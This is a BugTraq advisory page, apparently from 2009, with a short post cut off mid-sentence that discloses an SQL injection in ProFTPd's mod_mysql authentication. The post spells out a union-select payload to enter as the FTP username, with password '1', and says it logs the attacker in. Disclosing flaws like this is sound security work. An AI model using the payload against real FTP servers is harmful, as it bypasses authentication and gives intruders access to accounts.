BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Feb 10 2009 07:49PM
gat3way gat3way eu
Hello,

Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --

and a password of "1" (without quotes).

which leads to a successful login. Differ...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus